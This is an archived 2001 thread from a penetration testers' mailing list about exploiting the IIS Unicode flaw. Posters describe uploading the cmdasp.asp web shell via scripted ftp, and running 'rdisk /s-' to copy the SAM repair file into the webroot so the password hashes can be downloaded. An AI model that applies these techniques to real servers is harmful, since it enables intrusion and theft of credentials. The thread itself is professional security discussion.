Re: Pwdump2 with UNICODE?

From: Tony Lambiris (methodicat_private)
Date: Thu Aug 09 2001 - 10:35:27 PDT

Next message: INA (V. Brahmanandam): "RE: besides "sa" who can run xp_cmdshell"

Previous message: Tina Bird: "Loganalysis mailing list"
Next in thread: steven.m.gillat_private: "Re: Pwdump2 with UNICODE?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Ahh.. so you can basically echo a bunch of ftp commands to a file, run
the ftp client -s:filename.txt to have the box download cmdasp.asp, and
then you can just have that page execute commands?

Nice.

On 08.09.01, "Sapiro, Benjamin R" <bsapiroat_private> wrote:
> Tony
> 
> Under IIS4, CMDASP.asp executes in system level context so you are able to
> do that (CMDASP.asp has nothing to do with the unicode vuln. itself, we just
> use unicode attacks to get script up onto the box). You are right though, a
> unicode executed command by itself runs under IUSR context
> 
> Ben Sapiro
> Information Risk Management
> (416) 777-8025
> www.kpmg.ca/irm
> 
> 
> -----Original Message-----
> From: Tony Lambiris [mailto:methodicat_private]
> Sent: Wednesday, August 08, 2001 1:46 PM
> To: Penetration Testers
> Subject: Re: Pwdump2 with UNICODE?
> 
> 
> I thought under UNICODE, you arent able to run such commands as rdisk
> and pwdump, because IIS runs as IUSR?
> 
> On 08.07.01, Kevin Lam <kevinlam@packet-works.com> wrote:
> > Hi Allen,
> > 
> > If you have UNICODE working, you could upload cmdasp.asp which will let
> > you execute commands on that server.
> > 
> > If this is NT then what you can do is run "rdisk /s-" to silently update
> > the repair sam._ file (this is a little trick that I used to use when I
> > did pen-testing for Deloitte).  Then go to c:\winnt\repair and copy
> > sam._ to say a public internet folder like c:\inetpub\wwwroot and then
> > go to your browser and just download the file.
> 
> 
> ******************************************************************************
> The information in this email is confidential and may be legally privileged.
> It is intended solely for the addressee. Access to this email by anyone else
> is unauthorized.
>  
> If you are not the intended recipient, any disclosure, copying, distribution
> or any action taken or omitted to be taken in reliance on it, is prohibited
> and may be unlawful. When addressed to our clients any opinions or advice
> contained in this email are subject to the terms and conditions expressed in
> the governing KPMG client engagement contract.
> ******************************************************************************

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: INA (V. Brahmanandam): "RE: besides "sa" who can run xp_cmdshell"
Previous message: Tina Bird: "Loganalysis mailing list"
Next in thread: steven.m.gillat_private: "Re: Pwdump2 with UNICODE?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Aug 09 2001 - 15:42:27 PDT